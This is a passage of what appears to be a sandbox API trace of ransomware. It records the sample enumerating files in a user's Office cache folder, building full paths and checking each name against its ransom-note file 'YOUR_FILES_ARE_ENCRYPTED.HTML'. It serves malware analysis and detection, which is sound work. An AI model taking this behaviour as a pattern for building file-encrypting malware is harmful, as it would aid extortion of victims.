ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x824b5bdf, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3894, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="7F2B5D98-CDB4-4040-91F6-85F1A584B908", cAlternateFileName="7F2B5D~1")) returned 1 [0111.371] StrStrIW (lpFirst="7F2B5D98-CDB4-4040-91F6-85F1A584B908", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.371] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\7F2B5D98-CDB4-4040-91F6-85F1A584B908") returned 157 [0111.371] PathFindExtensionW (pszPath="7F2B5D98-CDB4-4040-91F6-85F1A584B908") returned="" [0111.371] lstrlenW (lpString="") returned 0 [0111.371] PathFindExtensionW (pszPath="7F2B5D98-CDB4-4040-91F6-85F1A584B908") returned="" [0111.371] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823898cf, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x823898cf, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x8238ac08, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x235a, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="7F4254FF-617B-48B1-97DE-6A1D6CA2E32C", cAlternateFileName="7F4254~1")) returned 1 [0111.372] StrStrIW (lpFirst="7F4254FF-617B-48B1-97DE-6A1D6CA2E32C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.372] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\7F4254FF-617B-48B1-97DE-6A1D6CA2E32C") returned 157 [0111.372] PathFindExtensionW (pszPath="7F4254FF-617B-48B1-97DE-6A1D6CA2E32C") returned="" [0111.372] lstrlenW (lpString="") returned 0 [0111.372] PathFindExtensionW (pszPath="7F4254FF-617B-48B1-97DE-6A1D6CA2E32C") returned="" [0111.372] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b59afa, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82b59afa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82b59afa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x98d6, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="7F96D0A4-ECC8-4300-A3C4-8C2B5918BBAA", cAlternateFileName="7F96D0~1")) returned 1 [0111.372] StrStrIW (lpFirst="7F96D0A4-ECC8-4300-A3C4-8C2B5918BBAA", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.372] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\7F96D0A4-ECC8-4300-A3C4-8C2B5918BBAA") returned 157 [0111.372] PathFindExtensionW (pszPath="7F96D0A4-ECC8-4300-A3C4-8C2B5918BBAA") returned="" [0111.372] lstrlenW (lpString="") returned 0 [0111.372] PathFindExtensionW (pszPath="7F96D0A4-ECC8-4300-A3C4-8C2B5918BBAA") returned="" [0111.372] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a05a2f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8a05a2f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8a06e54, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc11, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="806760D6-0D46-4F0D-9A2A-5619D868318C", cAlternateFileName="806760~1")) returned 1 [0111.372] StrStrIW (lpFirst="806760D6-0D46-4F0D-9A2A-5619D868318C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.372] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\806760D6-0D46-4F0D-9A2A-5619D868318C") returned 157 [0111.372] PathFindExtensionW (pszPath="806760D6-0D46-4F0D-9A2A-5619D868318C") returned="" [0111.372] lstrlenW (lpString="") returned 0 [0111.372] PathFindExtensionW (pszPath="806760D6-0D46-4F0D-9A2A-5619D868318C") returned="" [0111.372] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c637d9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4c637d9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4c637d9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x7cb, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="8160DA12-638F-4ACD-AE82-1AB81E472250", cAlternateFileName="8160DA~1")) returned 1 [0111.372] StrStrIW (lpFirst="8160DA12-638F-4ACD-AE82-1AB81E472250", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.372] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\8160DA12-638F-4ACD-AE82-1AB81E472250") returned 157 [0111.372] PathFindExtensionW (pszPath="8160DA12-638F-4ACD-AE82-1AB81E472250") returned="" [0111.372] lstrlenW (lpString="") returned 0 [0111.372] PathFindExtensionW (pszPath="8160DA12-638F-4ACD-AE82-1AB81E472250") returned="" [0111.372] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8565b98, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8565b98, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8565b98, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4c8, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="825BFDEB-777E-4DF1-818C-7CA4FC0D3016", cAlternateFileName="825BFD~1")) returned 1 [0111.372] StrStrIW (lpFirst="825BFDEB-777E-4DF1-818C-7CA4FC0D3016", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.372] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\825BFDEB-777E-4DF1-818C-7CA4FC0D3016") returned 157 [0111.372] PathFindExtensionW (pszPath="825BFDEB-777E-4DF1-818C-7CA4FC0D3016") returned="" [0111.372] lstrlenW (lpString="") returned 0 [0111.372] PathFindExtensionW (pszPath="825BFDEB-777E-4DF1-818C-7CA4FC0D3016") returned="" [0111.372] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84e7d50, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc84e7d50, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc84e9287, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x9c3, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="82B38E75-3368-40D2-B1E5-193E0E558D48", cAlternateFileName="82B38E~1")) returned 1 [0111.372] StrStrIW (lpFirst="82B38E75-3368-40D2-B1E5-193E0E558D48", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.372] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\82B38E75-3368-40D2-B1E5-193E0E558D48") returned 157 [0111.372] PathFindExtensionW (pszPath="82B38E75-3368-40D2-B1E5-193E0E558D48") returned="" [0111.373] lstrlenW (lpString="") returned 0 [0111.373] PathFindExtensionW (pszPath="82B38E75-3368-40D2-B1E5-193E0E558D48") returned="" [0111.373] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9fbc4f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9fbc4f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9fbc4f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1f8f, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="84A2284E-16E6-4B9D-8808-4A72FB690DB6", cAlternateFileName="84A228~1")) returned 1 [0111.379] StrStrIW (lpFirst="84A2284E-16E6-4B9D-8808-4A72FB690DB6", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.379] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\84A2284E-16E6-4B9D-8808-4A72FB690DB6") returned 157 [0111.379] PathFindExtensionW (pszPath="84A2284E-16E6-4B9D-8808-4A72FB690DB6") returned="" [0111.379] lstrlenW (lpString="") returned 0 [0111.379] PathFindExtensionW (pszPath="84A2284E-16E6-4B9D-8808-4A72FB690DB6") returned="" [0111.379] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaba093e4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaba093e4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaba093e4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x507d, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="8618DFC3-EF76-4235-AA5D-06BEABD6E242", cAlternateFileName="8618DF~1")) returned 1 [0111.379] StrStrIW (lpFirst="8618DFC3-EF76-4235-AA5D-06BEABD6E242", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.379] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\8618DFC3-EF76-4235-AA5D-06BEABD6E242") returned 157 [0111.379] PathFindExtensionW (pszPath="8618DFC3-EF76-4235-AA5D-06BEABD6E242") returned="" [0111.379] lstrlenW (lpString="") returned 0 [0111.379] PathFindExtensionW (pszPath="8618DFC3-EF76-4235-AA5D-06BEABD6E242") returned="" [0111.379] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d25907, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4d25907, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4d26c6a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x422e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="88379636-4361-4434-BAAC-DDFBFF18EA87", cAlternateFileName="883796~1")) returned 1 [0111.379] StrStrIW (lpFirst="88379636-4361-4434-BAAC-DDFBFF18EA87", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.380] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\88379636-4361-4434-BAAC-DDFBFF18EA87") returned 157 [0111.380] PathFindExtensionW (pszPath="88379636-4361-4434-BAAC-DDFBFF18EA87") returned="" [0111.380] lstrlenW (lpString="") returned 0 [0111.380] PathFindExtensionW (pszPath="88379636-4361-4434-BAAC-DDFBFF18EA87") returned="" [0111.380] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c2c9d8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4c2c9d8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4c2c9d8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x17be, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="89953CAA-1AB9-4A6E-A488-DFEFC5075387", cAlternateFileName="89953C~1")) returned 1 [0111.380] StrStrIW (lpFirst="89953CAA-1AB9-4A6E-A488-DFEFC5075387", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.380] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\89953CAA-1AB9-4A6E-A488-DFEFC5075387") returned 157 [0111.380] PathFindExtensionW (pszPath="89953CAA-1AB9-4A6E-A488-DFEFC5075387") returned="" [0111.380] lstrlenW (lpString="") returned 0 [0111.380] PathFindExtensionW (pszPath="89953CAA-1AB9-4A6E-A488-DFEFC5075387") returned="" [0111.380] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e3972e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e3972e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e3972e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x6f72, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="8B81DCE3-0352-4D1A-8796-3D33B012E68D", cAlternateFileName="8B81DC~1")) returned 1 [0111.380] StrStrIW (lpFirst="8B81DCE3-0352-4D1A-8796-3D33B012E68D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.380] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\8B81DCE3-0352-4D1A-8796-3D33B012E68D") returned 157 [0111.380] PathFindExtensionW (pszPath="8B81DCE3-0352-4D1A-8796-3D33B012E68D") returned="" [0111.380] lstrlenW (lpString="") returned 0 [0111.380] PathFindExtensionW (pszPath="8B81DCE3-0352-4D1A-8796-3D33B012E68D") returned="" [0111.380] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47c424d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb47c424d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb47c424d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="8C50BEB8-804A-419A-A2CB-C43F9CA9CDC2", cAlternateFileName="8C50BE~1")) returned 1 [0111.380] StrStrIW (lpFirst="8C50BEB8-804A-419A-A2CB-C43F9CA9CDC2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.380] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\8C50BEB8-804A-419A-A2CB-C43F9CA9CDC2") returned 157 [0111.380] PathFindExtensionW (pszPath="8C50BEB8-804A-419A-A2CB-C43F9CA9CDC2") returned="" [0111.380] lstrlenW (lpString="") returned 0 [0111.380] PathFindExtensionW (pszPath="8C50BEB8-804A-419A-A2CB-C43F9CA9CDC2") returned="" [0111.380] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ac863d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82ac863d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82ac9960, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x541f, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="8EE3590E-CE33-42C6-8250-DF185AF8DAA4", cAlternateFileName="8EE359~1")) returned 1 [0111.380] StrStrIW (lpFirst="8EE3590E-CE33-42C6-8250-DF185AF8DAA4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.380] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\8EE3590E-CE33-42C6-8250-DF185AF8DAA4") returned 157 [0111.380] PathFindExtensionW (pszPath="8EE3590E-CE33-42C6-8250-DF185AF8DAA4") returned="" [0111.380] lstrlenW (lpString="") returned 0 [0111.380] PathFindExtensionW (pszPath="8EE3590E-CE33-42C6-8250-DF185AF8DAA4") returned="" [0111.380] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb476eaa3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb476eaa3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb476fe6d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4c3c, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="9056E597-0C30-4F42-BA7A-70B004BF042A", cAlternateFileName="9056E5~1")) returned 1 [0111.380] StrStrIW (lpFirst="9056E597-0C30-4F42-BA7A-70B004BF042A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.380] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\9056E597-0C30-4F42-BA7A-70B004BF042A") returned 157 [0111.380] PathFindExtensionW (pszPath="9056E597-0C30-4F42-BA7A-70B004BF042A") returned="" [0111.380] lstrlenW (lpString="") returned 0 [0111.380] PathFindExtensionW (pszPath="9056E597-0C30-4F42-BA7A-70B004BF042A") returned="" [0111.380] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49b7e91, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb49b7e91, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49b7e91, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x12b8, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="92D09C47-EFFB-4E54-B85D-797F67B0527C", cAlternateFileName="92D09C~1")) returned 1 [0111.380] StrStrIW (lpFirst="92D09C47-EFFB-4E54-B85D-797F67B0527C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.381] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\92D09C47-EFFB-4E54-B85D-797F67B0527C") returned 157 [0111.381] PathFindExtensionW (pszPath="92D09C47-EFFB-4E54-B85D-797F67B0527C") returned="" [0111.381] lstrlenW (lpString="") returned 0 [0111.381] PathFindExtensionW (pszPath="92D09C47-EFFB-4E54-B85D-797F67B0527C") returned="" [0111.381] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9c2614, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9c2614, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9c39a7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x372b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="93E73324-E1D3-456F-9F93-98471AC3911D", cAlternateFileName="93E733~1")) returned 1 [0111.381] StrStrIW (lpFirst="93E73324-E1D3-456F-9F93-98471AC3911D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.381] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\93E73324-E1D3-456F-9F93-98471AC3911D") returned 157 [0111.381] PathFindExtensionW (pszPath="93E73324-E1D3-456F-9F93-98471AC3911D") returned="" [0111.381] lstrlenW (lpString="") returned 0 [0111.381] PathFindExtensionW (pszPath="93E73324-E1D3-456F-9F93-98471AC3911D") returned="" [0111.381] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc848065f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc848065f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc84819da, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3b7, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="95301B49-34BE-47D5-99D1-1C50A4B80C13", cAlternateFileName="95301B~1")) returned 1 [0111.381] StrStrIW (lpFirst="95301B49-34BE-47D5-99D1-1C50A4B80C13", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.381] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\95301B49-34BE-47D5-99D1-1C50A4B80C13") returned 157 [0111.381] PathFindExtensionW (pszPath="95301B49-34BE-47D5-99D1-1C50A4B80C13") returned="" [0111.381] lstrlenW (lpString="") returned 0 [0111.381] PathFindExtensionW (pszPath="95301B49-34BE-47D5-99D1-1C50A4B80C13") returned="" [0111.381] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabb715e7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabb715e7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabb715e7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x372b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="95AFB9A8-DEAD-49F6-9234-BEA10973F0CD", cAlternateFileName="95AFB9~1")) returned 1 [0111.381] StrStrIW (lpFirst="95AFB9A8-DEAD-49F6-9234-BEA10973F0CD", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.381] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\95AFB9A8-DEAD-49F6-9234-BEA10973F0CD") returned 157 [0111.381] PathFindExtensionW (pszPath="95AFB9A8-DEAD-49F6-9234-BEA10973F0CD") returned="" [0111.381] lstrlenW (lpString="") returned 0 [0111.381] PathFindExtensionW (pszPath="95AFB9A8-DEAD-49F6-9234-BEA10973F0CD") returned="" [0111.381] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9b143c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9b143c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9b284f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a3b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="962C92E3-9BE1-4BE7-858C-36E683F756EE", cAlternateFileName="962C92~1")) returned 1 [0111.381] StrStrIW (lpFirst="962C92E3-9BE1-4BE7-858C-36E683F756EE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.381] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\962C92E3-9BE1-4BE7-858C-36E683F756EE") returned 157 [0111.381] PathFindExtensionW (pszPath="962C92E3-9BE1-4BE7-858C-36E683F756EE") returned="" [0111.381] lstrlenW (lpString="") returned 0 [0111.381] PathFindExtensionW (pszPath="962C92E3-9BE1-4BE7-858C-36E683F756EE") returned="" [0111.381] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a305e3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8a305e3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8a7fd33, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x7d42, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="9639F732-A0F4-4A33-92A0-01330C0BB8C3", cAlternateFileName="9639F7~1")) returned 1 [0111.381] StrStrIW (lpFirst="9639F732-A0F4-4A33-92A0-01330C0BB8C3", 